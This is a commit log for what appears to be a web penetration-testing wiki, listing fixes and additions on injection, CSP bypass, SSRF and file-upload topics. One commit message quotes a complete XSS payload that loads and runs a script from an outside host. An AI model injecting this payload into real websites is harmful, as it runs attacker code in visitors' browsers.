Commit graph

1179 commits

Author SHA1 Message Date
Christopher Pritchard
4b445305da
Update nosql-injection.md with fixed brute force script
Fixed login brute force script so it doesn't just find one username per starting letter - this royally boned me and I don't want anyone else to feel the pain.
2023-12-08 20:56:03 +13:00
KeoOp
1291831b76
fix typo in deserialization/readme.md 2023-12-07 13:41:51 +09:00
carlospolop
81005f76c9 hp 2023-12-04 16:57:41 +01:00
carlospolop
21ed9007c4 hackenproof 2023-12-04 16:45:05 +01:00
CPol
0a792c2576
GITBOOK-4178: change request with no subject merged in GitBook 2023-12-04 15:17:30 +00:00
CPol
f6cedd55e4
GITBOOK-4174: change request with no subject merged in GitBook 2023-12-04 09:33:43 +00:00
CPol
ae3c6e44b7
GITBOOK-4173: change request with no subject merged in GitBook 2023-12-04 09:24:40 +00:00
Maximilian Hildebrand
d3d3f4f47a
Added TInjA and the Template Injection Table 2023-12-03 13:14:19 +01:00
SidneyJob
76f93375d2 Fix mini spell mistake 2023-11-21 18:40:35 +03:00
CPol
04c2dccb6f
GITBOOK-4163: change request with no subject merged in GitBook 2023-11-09 15:12:11 +00:00
Carlos Polop
4c79f1cd10
Merge branch 'master' into master 2023-11-05 23:18:06 +01:00
CPol
f515ab26e7
GITBOOK-4149: change request with no subject merged in GitBook 2023-11-03 13:29:31 +00:00
CPol
a3ad24c9ea
GITBOOK-4148: change request with no subject merged in GitBook 2023-11-03 11:03:53 +00:00
CPol
233703a1b1
GITBOOK-4146: change request with no subject merged in GitBook 2023-11-02 16:52:21 +00:00
CPol
46d107852a
GITBOOK-4142: change request with no subject merged in GitBook 2023-10-27 16:04:24 +00:00
CPol
1015696215
GITBOOK-4141: change request with no subject merged in GitBook 2023-10-27 15:46:20 +00:00
Felipe Molina
306481ac24 Add new CSP bypasses through third-parties 2023-10-26 18:30:16 +01:00
Felipe Molina
548aed19f8 Add new CSP bypasses through third-parties 2023-10-26 18:20:03 +01:00
CPol
0272b33ab5
GITBOOK-4140: change request with no subject merged in GitBook 2023-10-26 14:15:46 +00:00
Felipe Molina
121d793ce0 Update CSP methods for third parties 2023-10-23 15:43:34 +01:00
CPol
0742844ba3
GITBOOK-4132: change request with no subject merged in GitBook 2023-10-16 21:06:07 +00:00
CPol
63857c0541
GITBOOK-4126: change request with no subject merged in GitBook 2023-10-15 16:45:54 +00:00
CPol
c383ffed62
GITBOOK-4125: change request with no subject merged in GitBook 2023-10-15 15:23:24 +00:00
CPol
6a5f71e401
GITBOOK-4121: change request with no subject merged in GitBook 2023-10-14 20:45:59 +00:00
Carlos Polop
d7f82e9005
Merge pull request #710 from kibatche/master
Update file-upload.md / Replace cStringIO by io
2023-10-11 23:27:32 +02:00
Carlos Polop
e5a76ef436
Merge pull request #708 from jiniljeil/patch-1
Fix typo in http-request-smuggling
2023-10-11 23:00:14 +02:00
CPol
aafdb7f10e
GITBOOK-4111: change request with no subject merged in GitBook 2023-10-05 14:47:43 +00:00
CPol
bce38a19cf
GITBOOK-4110: change request with no subject merged in GitBook 2023-10-05 10:00:26 +00:00
CPol
0cd8734cc5
GITBOOK-4104: change request with no subject merged in GitBook 2023-09-29 15:36:01 +00:00
CPol
261348bb2c
GITBOOK-4100: change request with no subject merged in GitBook 2023-09-28 15:09:34 +00:00
CPol
7d1cde6b91
GITBOOK-4096: change request with no subject merged in GitBook 2023-09-26 11:09:53 +00:00
kibatche
86f9653abf
Update file-upload.md / Replace cStringIO by io
Originally, I wrote the script for the little trick "Decompress with a different name" with the module "cStringIo". I don't remember why exactly, but when tested again at home to write about this stuff, I found that cStringIo is not present anymore on python3. It works with python2.7, but `io` is better because it works with both modules.

And, I wrote " we can reuse the previous script". That's not true haha !

I think this is better to keep consistency with your previous work, and have more compatibility with different python version.

Let me know if it's ok for you. Thanks !
2023-09-25 18:02:57 +02:00
CPol
afd72865a1
GITBOOK-4092: change request with no subject merged in GitBook 2023-09-24 09:51:34 +00:00
Jinil Kim
4e887c2998
Fix typo in http-request-smuggling
Fix typo from lentgh to length in pentesting-web/http-request-smuggling
2023-09-21 08:56:51 +09:00
Jinil Kim
2d9e6fd60c
Fix typo in http-request-smuggling
Fix typo from lenght to length
2023-09-21 08:45:08 +09:00
Jinil Kim
4154ac12e0
Fix typo in content-security-policy-csp-bypass
Fix typo from executa to execute
2023-09-17 22:40:55 +09:00
carlospolop
93b6df668e trickest 2023-09-05 00:10:11 +02:00
carlospolop
987e1109d8 trickest 2023-09-03 17:41:02 +02:00
carlospolop
d308298b26 intruder 2023-09-03 01:51:32 +02:00
carlospolop
2463753c56 intruder 2023-09-03 01:48:41 +02:00
kibatche
79420b6a6b add a detail about the null byte 2023-09-01 11:32:12 +02:00
kibatche
982b7cbbaf added decompress with a different name section for file upload part. 2023-09-01 11:14:36 +02:00
Carlos Polop
97e15d0836
Update oracle-injection.md 2023-08-31 19:32:23 +02:00
Carlos Polop
d8c5b1519f
Update oracle-injection.md 2023-08-31 19:23:25 +02:00
Carlos Polop
715b9e57bb
Update mysql-ssrf.md 2023-08-31 19:22:39 +02:00
Carlos Polop
1d2514cce6
Update mssql-injection.md 2023-08-31 19:21:46 +02:00
CPol
de29299ee4
GITBOOK-4062: change request with no subject merged in GitBook 2023-08-31 17:11:43 +00:00
CPol
0de31f2383
GITBOOK-4061: change request with no subject merged in GitBook 2023-08-31 15:11:42 +00:00
CPol
749e1c091d
GITBOOK-4059: change request with no subject merged in GitBook 2023-08-30 09:07:26 +00:00
Carlos Polop
345f66d083
Merge pull request #697 from Alemmi/csp-bypass-webrtc
Add WebRTC leak
2023-08-29 21:02:57 +02:00
Carlos Polop
3babd90c7d
Merge pull request #689 from bl13pbl03p/master-1
Tiny spelling correction
2023-08-29 20:13:51 +02:00
Carlos Polop
5125eac7d1
Merge pull request #687 from 0x4bit/master
Update formula-doc-latex-injection.md
2023-08-29 19:53:28 +02:00
CPol
b5ff9ff583
GITBOOK-4056: change request with no subject merged in GitBook 2023-08-28 09:09:07 +00:00
CPol
9b67ad7b7f
GITBOOK-4055: change request with no subject merged in GitBook 2023-08-28 09:01:12 +00:00
Alessandro Mizzaro
391ca4ad7e
Add WebRTC leak 2023-08-27 21:27:30 +02:00
Carlos Polop
e981e7a1ba
Merge pull request #682 from Yogi-Codes/patch-1
Update hacking-jwt-json-web-tokens.md
2023-08-24 13:16:47 +02:00
CPol
9f7b965e16
GITBOOK-4048: change request with no subject merged in GitBook 2023-08-24 08:49:18 +00:00
CPol
7b95b4b0e9
GITBOOK-4044: change request with no subject merged in GitBook 2023-08-22 09:57:13 +00:00
CPol
036fa3c3a6
GITBOOK-4040: change request with no subject merged in GitBook 2023-08-16 09:26:10 +00:00
CPol
9047909444
GITBOOK-4038: change request with no subject merged in GitBook 2023-08-16 08:24:17 +00:00
CPol
554b95eac8
GITBOOK-4035: change request with no subject merged in GitBook 2023-08-16 04:32:29 +00:00
CPol
4c29b49ee0
GITBOOK-4034: change request with no subject merged in GitBook 2023-08-15 18:05:01 +00:00
CPol
fd47bcfc8d
GITBOOK-4031: change request with no subject merged in GitBook 2023-08-15 01:35:49 +00:00
bl13pbl03p
7a3295cc38
Tiny spelling correction 2023-08-11 16:14:36 +02:00
CPol
507d257f46
GITBOOK-4029: change request with no subject merged in GitBook 2023-08-09 16:54:14 +00:00
0x4bit
cf9b008f1b
Update formula-doc-latex-injection.md
Added wrapper hint from PayloadsAllTheThings
2023-08-08 14:24:42 +02:00
CPol
751055cd29
GITBOOK-4028: change request with no subject merged in GitBook 2023-08-08 08:05:16 +00:00
CPol
5f3d054d57
GITBOOK-4024: change request with no subject merged in GitBook 2023-08-02 15:09:22 +00:00
Yogi-Codes
4e9c9398d8
Update hacking-jwt-json-web-tokens.md
Just minor correction
2023-08-02 10:28:36 +05:30
CPol
d66ecb4cdd
GITBOOK-4021: change request with no subject merged in GitBook 2023-07-31 15:59:11 +00:00
CPol
84d05a4c74
GITBOOK-4018: change request with no subject merged in GitBook 2023-07-30 21:28:42 +00:00
CPol
0b9f09f1ce
GITBOOK-4016: change request with no subject merged in GitBook 2023-07-28 11:44:45 +00:00
matan h
3faa1a5e69
Add one example of pHp protocol cases and add my own base64 file extension bypass. 2023-07-20 10:40:33 +03:00
Carlos Polop
df038bd147
Merge pull request #673 from entr0pie/master
Fixed grammar on the "Manipualating Email Parameter" section of pentesting-web/reset-password
2023-07-19 13:20:43 +02:00
Carlos Polop
a1be5b4742
Merge pull request #667 from abhishekmorla/patch-1
Update oauth-to-account-takeover.md
2023-07-19 13:05:54 +02:00
Carlos Polop
73e07dbcbd
Merge pull request #669 from sAjibuu/patch-1
Update README.md
2023-07-19 13:05:03 +02:00
tandera
5126ce15d4
Fixed grammar on the "Manipualating Email Parameter" section 2023-07-15 23:29:21 -03:00
carlospolop
d84af2b1f5 hp 2023-07-14 17:03:41 +02:00
CPol
f51a325cb6
GITBOOK-4010: change request with no subject merged in GitBook 2023-07-14 13:56:11 +00:00
CPol
f11b4d1856
GITBOOK-4008: change request with no subject merged in GitBook 2023-07-13 09:57:55 +00:00
CPol
224ce0cf17
GITBOOK-4007: change request with no subject merged in GitBook 2023-07-11 13:23:18 +00:00
Sagiv
9f184d9633
Update README.md 2023-07-09 09:03:36 +03:00
Abhishek Morla
04d5d62ca6
Update oauth-to-account-takeover.md
clarifying the pre account takeover 2nd part
2023-07-08 09:21:28 +05:30
CPol
5626c2fdf6
GITBOOK-3993: change request with no subject merged in GitBook 2023-06-26 10:50:26 +00:00
CPol
1b10ed65e2
GITBOOK-3992: change request with no subject merged in GitBook 2023-06-25 23:05:20 +00:00
CPol
9a68c91e4e
GITBOOK-3984: change request with no subject merged in GitBook 2023-06-14 10:51:55 +00:00
CPol
fa3b6dffc2
GITBOOK-3983: change request with no subject merged in GitBook 2023-06-14 00:31:26 +00:00
CPol
0164fe76c8
GITBOOK-3982: change request with no subject merged in GitBook 2023-06-13 16:23:33 +00:00
CPol
5850e04a1f
GITBOOK-3981: change request with no subject merged in GitBook 2023-06-13 10:26:10 +00:00
CPol
95e2677e3c
GITBOOK-3979: change request with no subject merged in GitBook 2023-06-13 09:22:46 +00:00
CPol
aac81361dc
GITBOOK-3975: change request with no subject merged in GitBook 2023-06-10 23:31:32 +00:00
CPol
273f175b12
GITBOOK-3971: change request with no subject merged in GitBook 2023-06-08 16:46:11 +00:00
CPol
cd4025c14f
GITBOOK-3968: change request with no subject merged in GitBook 2023-06-06 22:57:49 +00:00
CPol
e53c11a86a
GITBOOK-3966: change request with no subject merged in GitBook 2023-06-06 21:42:32 +00:00
CPol
ff4a3d95b7
GITBOOK-3962: change request with no subject merged in GitBook 2023-06-01 20:34:49 +00:00
CPol
dacd10af82
GITBOOK-3959: change request with no subject merged in GitBook 2023-05-30 18:44:01 +00:00
CPol
fbc68e5920
GITBOOK-3956: change request with no subject merged in GitBook 2023-05-29 10:35:28 +00:00
CPol
0a0edcec2e
GITBOOK-3950: change request with no subject merged in GitBook 2023-05-28 13:35:03 +00:00
CPol
28e205b34c
GITBOOK-3949: change request with no subject merged in GitBook 2023-05-26 15:11:27 +00:00
CPol
c6842d3ff8
GITBOOK-3947: change request with no subject merged in GitBook 2023-05-26 11:10:05 +00:00
carlospolop
fdf9afee4e hacking career 2023-05-26 11:43:15 +02:00
Carlos Polop
cdcae14a54
Merge pull request #635 from bl13pbl03p/patch-1
Completed payload
2023-05-26 11:40:54 +02:00
Carlos Polop
8c3ad1340e
Merge pull request #646 from anoduck/patch-1
Update cross-site-websocket-hijacking-cswsh.md
2023-05-26 11:38:04 +02:00
Carlos Polop
63f93aedc6
Merge pull request #639 from Eferus/master
Reorganize Domain Confusion list in SSRF
2023-05-26 11:34:46 +02:00
Carlos Polop
65554df230
Merge pull request #637 from mdprain/mdprain-csrf-fix
Add missing HTML form methods for POST exploits
2023-05-26 11:31:07 +02:00
Carlos Polop
4b36725f03
Merge pull request #636 from syselement/patch-1
Update README.md - SQLMap CheatSheet
2023-05-26 11:30:39 +02:00
Carlos Polop
b2fcc5d7a1
Merge pull request #632 from TomF0x/patch-1
Update cypher-injection-neo4j.md
2023-05-26 11:29:11 +02:00
Carlos Polop
efccd3f03f
Merge pull request #631 from NaxnN/patch-2
fix a missing space in a cypher-injection payload
2023-05-26 11:28:45 +02:00
CPol
149284a747
GITBOOK-3943: change request with no subject merged in GitBook 2023-05-24 22:31:58 +00:00
Anoduck
2ab2af5bcb
Update cross-site-websocket-hijacking-cswsh.md
Corrected typos on line 81 and 82
2023-05-20 09:28:25 +00:00
CPol
419be89fe7
GITBOOK-3933: change request with no subject merged in GitBook 2023-05-18 12:13:32 +00:00
CPol
b212998555
GITBOOK-3915: change request with no subject merged in GitBook 2023-05-12 14:33:51 +00:00
CPol
5a46a7c396
GITBOOK-3907: change request with no subject merged in GitBook 2023-05-10 14:04:00 +00:00
CPol
2fafcfd659
GITBOOK-3903: change request with no subject merged in GitBook 2023-05-09 16:45:28 +00:00
CPol
f2762b0fb2
GITBOOK-3896: change request with no subject merged in GitBook 2023-05-08 09:41:51 +00:00
Eferus
a3d91ce362
Reorganize Domain Confusion list in SSRF
* Remove duplicates
* Add payloads
2023-05-06 04:28:16 +02:00
Matthew Prain
ac9e066bb6
Add missing HTML form methods for POST exploits
"Form POST request" and "Form POST request through iframe" now have the correct POST method.
2023-05-05 10:24:18 +10:00
CPol
c469ce05ac
GITBOOK-3892: change request with no subject merged in GitBook 2023-05-04 23:22:39 +00:00
syselement
3ed41d5e00
Update README.md - SQLMap CheatSheet 2023-05-04 19:19:54 +02:00
bl13bl03p
4916da0f6e
Completed payload
Location: Line 896
Change: Added > to complete payload

`<img src=1 onerror="s=document.createElement('script');s.src='http://xss.rocks/xss.js';document.body.appendChild(s);">`
2023-05-03 19:27:46 +02:00
CPol
504234542f
GITBOOK-3885: change request with no subject merged in GitBook 2023-04-30 22:29:45 +00:00
CPol
ecd03d0108
GITBOOK-3884: change request with no subject merged in GitBook 2023-04-30 21:54:03 +00:00
CPol
98facb9725
GITBOOK-3883: change request with no subject merged in GitBook 2023-04-30 21:23:47 +00:00
TomFox
86fd85255e
Update cypher-injection-neo4j.md 2023-04-27 12:03:10 +02:00
KeoOp
f034eb35f1
fix a missing space in a cypher-injection payload
fix a missing space in url in cypher-injection-neo4j.md
2023-04-27 11:24:52 +08:00
Carlos Polop
e36ebc6dee
Merge pull request #616 from fssecur3/patch-1
Add special character to bypass file upload restrictions
2023-04-26 15:52:36 +02:00
carlospolop
5ec5b67e79 update twitter 2023-04-25 20:35:28 +02:00
CPol
34c27bc4e1
GITBOOK-3879: change request with no subject merged in GitBook 2023-04-18 23:46:39 +00:00
Francisco Spínola
0aefd22b53
Add special character to bypass file upload restrictions 2023-04-11 14:20:39 +01:00
CPol
b5069b5f86
GITBOOK-3870: change request with no subject merged in GitBook 2023-04-11 01:00:47 +00:00
Francisco Spínola
6a7fb5e4f4
Add special character to bypass file upload restrictions 2023-04-10 17:55:08 +01:00
carlospolop
286ea6a24c hacktricks cloud 2023-04-07 10:52:01 +02:00
CPol
cc9b5b1abb
GITBOOK-3867: change request with no subject merged in GitBook 2023-04-06 15:39:43 +00:00
CPol
6046750cc2
GITBOOK-3866: change request with no subject merged in GitBook 2023-04-06 10:05:52 +00:00
CPol
608d71d4a6
GITBOOK-3864: change request with no subject merged in GitBook 2023-04-05 23:11:20 +00:00
carlospolop
2197a2102f f 2023-04-05 17:19:27 +02:00
CPol
c3d99d5e4f
GITBOOK-3863: change request with no subject merged in GitBook 2023-04-05 15:16:57 +00:00
carlospolop
1fa9f77ec3 change 2023-04-05 14:02:54 +02:00
OxNinja
fbb21ead23
Fix wfuzz typos
Fixed some minor typos at /pentesting-web/web-tool-wfuzz.md
2023-03-31 13:56:52 +02:00
CPol
9687d27a38
GITBOOK-3851: change request with no subject merged in GitBook 2023-03-30 22:05:38 +00:00
CPol
221c5f2ad6
GITBOOK-3846: change request with no subject merged in GitBook 2023-03-29 15:51:50 +00:00
CPol
b68d444c7e
GITBOOK-3842: change request with no subject merged in GitBook 2023-03-28 22:07:13 +00:00
CPol
4e9432ed74
GITBOOK-3840: change request with no subject merged in GitBook 2023-03-28 17:50:22 +00:00
CPol
bfb02053d9
GITBOOK-3838: change request with no subject merged in GitBook 2023-03-28 11:38:04 +00:00
CPol
dee4c5fa4e
GITBOOK-3836: change request with no subject merged in GitBook 2023-03-28 10:15:00 +00:00
Carlos Polop
8a22e8590c
Merge pull request #611 from blacklanternsecurity/badsecrets
Badsecrets
2023-03-27 11:42:50 +02:00
Carlos Polop
b54069ccaf
Merge pull request #610 from Swiftrix/Swiftrix-patch-1
Update prototype-pollution-to-rce.md
2023-03-27 11:41:01 +02:00
Carlos Polop
57a6a58b47
Merge pull request #606 from blacklanternsecurity/master
BBOT for bucket enumeration, subdomain takeover
2023-03-27 11:38:20 +02:00
Carlos Polop
9c58a361bd
Merge pull request #604 from petersandor/fix/typo-beginning
fix: typos
2023-03-27 11:36:43 +02:00
liquidsec
2f41f6baba typo fix 2023-03-25 12:47:16 -04:00